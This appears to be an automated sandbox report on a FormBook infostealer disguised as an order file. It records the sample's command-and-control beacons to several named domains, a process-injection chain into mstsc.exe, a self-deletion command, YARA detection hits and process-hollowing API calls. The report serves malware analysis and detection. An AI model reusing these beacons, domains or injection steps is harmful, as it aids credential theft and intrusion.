61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> <!-- browser does not support iframe's --> </iframe> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49723 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 12, 2021 10:51:29.427136898 CEST | 224 | OUT | GET /meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib HTTP/1.1
Host: www.shadyshainarae.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 10:51:29.565346956 CEST | 225 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 12 May 2021 08:51:29 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60995c49-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49724 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 12, 2021 10:51:34.680213928 CEST | 226 | OUT | GET /meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj HTTP/1.1
Host: www.thefrankversion.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 10:51:34.817344904 CEST | 226 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 12 May 2021 08:51:34 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60995c49-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session ID:4
                                                                      Source IP:192.168.2.4
                                                                      Source Port:49725
                                                                      Destination IP:107.164.93.172
                                                                      Destination Port:80
                                                                      Process:C:\Windows\explorer.exe
                                                                      Timestamp:May 12, 2021 10:51:41.394385099 CEST
                                                                      kBytes transferred:227
                                                                      Direction:OUT
                                                                      Data:
                                                                      GET /meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA HTTP/1.1
                                                                      Host: www.tjanyancha.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session ID:5
                                                                      Source IP:192.168.2.4
                                                                      Source Port:49726
                                                                      Destination IP:104.164.26.246
                                                                      Destination Port:80
                                                                      Process:C:\Windows\explorer.exe
                                                                      Timestamp:May 12, 2021 10:51:47.347271919 CEST
                                                                      kBytes transferred:228
                                                                      Direction:OUT
                                                                      Data:
                                                                      GET /meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.dmowang.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp:May 12, 2021 10:51:47.953749895 CEST
                                                                      kBytes transferred:228
                                                                      Direction:IN
                                                                      Data:
                                                                      HTTP/1.1 301 Moved Permanently
                                                                      Location: /meub/index.jsp
                                                                      Server: Microsoft-IIS/7.5
                                                                      X-Powered-By: ASP.NET
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Headers: *
                                                                      Access-Control-Allow-Methods: GET, POST
                                                                      Date: Wed, 12 May 2021 08:51:49 GMT
                                                                      Connection: close
                                                                      Content-Length: 0


                                                                      Session ID:6
                                                                      Source IP:192.168.2.4
                                                                      Source Port:49727
                                                                      Destination IP:198.54.117.216
                                                                      Destination Port:80
                                                                      Process:C:\Windows\explorer.exe
                                                                      Timestamp:May 12, 2021 10:51:58.312855959 CEST
                                                                      kBytes transferred:229
                                                                      Direction:OUT
                                                                      Data:
                                                                      GET /meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.pocopage.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session ID:7
                                                                      Source IP:192.168.2.4
                                                                      Source Port:49728
                                                                      Destination IP:18.219.49.238
                                                                      Destination Port:80
                                                                      Process:C:\Windows\explorer.exe
                                                                      Timestamp:May 12, 2021 10:52:09.098130941 CEST
                                                                      kBytes transferred:233
                                                                      Direction:OUT
                                                                      Data:
                                                                      GET /meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.goodcreditcardshome.info
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp:May 12, 2021 10:52:09.267746925 CEST
                                                                      kBytes transferred:234
                                                                      Direction:IN
                                                                      Data:
                                                                      HTTP/1.1 302 Found
                                                                      content-length: 0
                                                                      location: https://www.goodcreditcardshome.info/meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj
                                                                      cache-control: no-cache
                                                                      connection: close


                                                                      Session ID:8
                                                                      Source IP:192.168.2.4
                                                                      Source Port:49729
                                                                      Destination IP:162.241.62.63
                                                                      Destination Port:80
                                                                      Process:C:\Windows\explorer.exe
                                                                      Timestamp:May 12, 2021 10:52:14.662301064 CEST
                                                                      kBytes transferred:234
                                                                      Direction:OUT
                                                                      Data:
                                                                      GET /meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox HTTP/1.1
                                                                      Host: www.pasteleriaruth.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp:May 12, 2021 10:52:14.828128099 CEST
                                                                      kBytes transferred:235
                                                                      Direction:IN
                                                                      Data:
                                                                      HTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 12 May 2021 08:52:14 GMT
                                                                      Server: Apache
                                                                      Location: https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox
                                                                      Content-Length: 338
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox">here</a>.</p></body></html>


                                                                      Session ID:9
                                                                      Source IP:192.168.2.4
                                                                      Source Port:49730
                                                                      Destination IP:34.102.136.180
                                                                      Destination Port:80
                                                                      Process:C:\Windows\explorer.exe
                                                                      Timestamp:May 12, 2021 10:52:19.946628094 CEST
                                                                      kBytes transferred:236
                                                                      Direction:OUT
                                                                      Data:
                                                                      GET /meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.amesshop.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp:May 12, 2021 10:52:20.083381891 CEST
                                                                      kBytes transferred:237
                                                                      Direction:IN
                                                                      Data:
                                                                      HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 08:52:20 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "609953af-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage

                                                                      Memory Usage

                                                                      High Level Behavior Distribution

                                                                      Behavior

                                                                      System Behavior

                                                                      General

                                                                      Start time:10:50:13
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
                                                                      Imagebase:0x80000
                                                                      File size:736768 bytes
                                                                      MD5 hash:9E819BCC826E7A20B0FD139CC4185195
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:10:50:16
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      Imagebase:0xe60000
                                                                      File size:736768 bytes
                                                                      MD5 hash:9E819BCC826E7A20B0FD139CC4185195
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:10:50:18
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:10:50:31
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\mstsc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                      Imagebase:0x9d0000
                                                                      File size:3444224 bytes
                                                                      MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:10:50:34
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:10:50:35
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis


                                                                        Executed Functions

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $%&l
                                                                        • API String ID: 0-3075001641
                                                                        • Opcode ID: 7b17cec6be93d969d222c4b9d91e80dfed09e13aeb526def96d94ad35eb4113c
                                                                        • Instruction ID: 10381a4f06f88e72bff0f8493d90517e4e08ead8cd53d79d4419da2e68b8cd90
                                                                        • Opcode Fuzzy Hash: 7b17cec6be93d969d222c4b9d91e80dfed09e13aeb526def96d94ad35eb4113c
                                                                        • Instruction Fuzzy Hash: 41328770B21204DFDB25DB65C490BEEB7F6AF89700F5240AAE5469B3A0CB35ED01CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0ADB758E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 6ee09115d936b2311f28c8c380c2cac1e36b2732998f9bc57a6c6c9f67fd4ff8
                                                                        • Instruction ID: 7b9e9341070fd877ad01a682afb94eee643d42f4132fc9c511c18b9840ebdef4
                                                                        • Opcode Fuzzy Hash: 6ee09115d936b2311f28c8c380c2cac1e36b2732998f9bc57a6c6c9f67fd4ff8
                                                                        • Instruction Fuzzy Hash: 4CA17D71D11219CFDB10CFA8C881BEEBBB2FF88314F4585A9D819A7240DB749985CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0ADB758E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 28f9e02a0624d86df77a22990599d1113d43316736982f318673ff97a29fbaf4
                                                                        • Instruction ID: 026feab74483bcb002e0b4df65439287352a2f9d9bffa1b34151e9a40eb7fb22
                                                                        • Opcode Fuzzy Hash: 28f9e02a0624d86df77a22990599d1113d43316736982f318673ff97a29fbaf4
                                                                        • Instruction Fuzzy Hash: C9917E71D11219CFDF10CFA9C841BEEBBB2BF88314F4585A9D819A7240DB749985CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0ADB6AD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 2b587147dd32cfee6e41135339d356fd8174a4dcf8c44316ff265c56582a247c
                                                                        • Instruction ID: 3edaafdd84072d0e93f221ec65064e2bc82980bb5ae955dcfb0523423e038770
                                                                        • Opcode Fuzzy Hash: 2b587147dd32cfee6e41135339d356fd8174a4dcf8c44316ff265c56582a247c
                                                                        • Instruction Fuzzy Hash: 632133B19002199FCF10CFAAC884BDEBBB5FF48314F51842AE959A7240D7789A55CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0ADB6AD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: abc1815eb18b2cb4d83593f2f443157bef51c139d4d8dd4c5123e2f4ee00b94d
                                                                        • Instruction ID: 27dae8ef84965b294b1d7c7dc07acc92b4cf28c036f72638a500faedfac520d3
                                                                        • Opcode Fuzzy Hash: abc1815eb18b2cb4d83593f2f443157bef51c139d4d8dd4c5123e2f4ee00b94d
                                                                        • Instruction Fuzzy Hash: 452133B19002099FCF10CFAAC884BDEBBF5FF48314F01842AE919A7240C778A954CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 0ADB692E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ContextThread
                                                                        • String ID:
                                                                        • API String ID: 1591575202-0
                                                                        • Opcode ID: cb0b531c0b36c7731752fd3f17ccf9c9d43a48c10e60448dff0f464525fdc5b6
                                                                        • Instruction ID: e7006d8f5a9242ebd19537366f31d1ae0c25a191765cc00b33780b21b4ae3ff5
                                                                        • Opcode Fuzzy Hash: cb0b531c0b36c7731752fd3f17ccf9c9d43a48c10e60448dff0f464525fdc5b6
                                                                        • Instruction Fuzzy Hash: 2A213A719103098FDB10CFAAC4857EEBBF4EF48224F55842AD559A7240DB78A945CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0ADB6BB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: b554721c868de60024d373db2431c3f6e30ab40fcfe071afb4641cd75a34ce64
                                                                        • Instruction ID: e9b5d68431b3a18083de9d73246ffb5ab2e237a7655d1ce4e62d7aa426126928
                                                                        • Opcode Fuzzy Hash: b554721c868de60024d373db2431c3f6e30ab40fcfe071afb4641cd75a34ce64
                                                                        • Instruction Fuzzy Hash: 02213B71800219DFCB10CFA9C8847DEFBB5FF48314F018429D969A7240D7389555CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 0ADB692E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ContextThread
                                                                        • String ID:
                                                                        • API String ID: 1591575202-0
                                                                        • Opcode ID: e9a7b996299ece61b03947cd369e2873e02c80558d990ee0faa602cb0f4fe895
                                                                        • Instruction ID: ba85908d3cc369974f4c0313ea0faa5d20ab1e328f00ec1aa935ba18c2fa3a43
                                                                        • Opcode Fuzzy Hash: e9a7b996299ece61b03947cd369e2873e02c80558d990ee0faa602cb0f4fe895
                                                                        • Instruction Fuzzy Hash: 7A2118719102098FDB10CFAAC4847EEBBF5EF48224F55842AD559A7240DB78A945CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0ADB6BB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 0460d0a6bf493805710df2c49e27536832239757d3950b0a7958827040a82d67
                                                                        • Instruction ID: f6be093d8e1c75bbf8803fea1f27152a6866c5fc5f0c5dc8efd3e15be32ef890
                                                                        • Opcode Fuzzy Hash: 0460d0a6bf493805710df2c49e27536832239757d3950b0a7958827040a82d67
                                                                        • Instruction Fuzzy Hash: 8F2125B1800249DFCB10CFAAC884BEEFBF5FF48314F51842AE919A7240C7789954CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0ADB2763
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
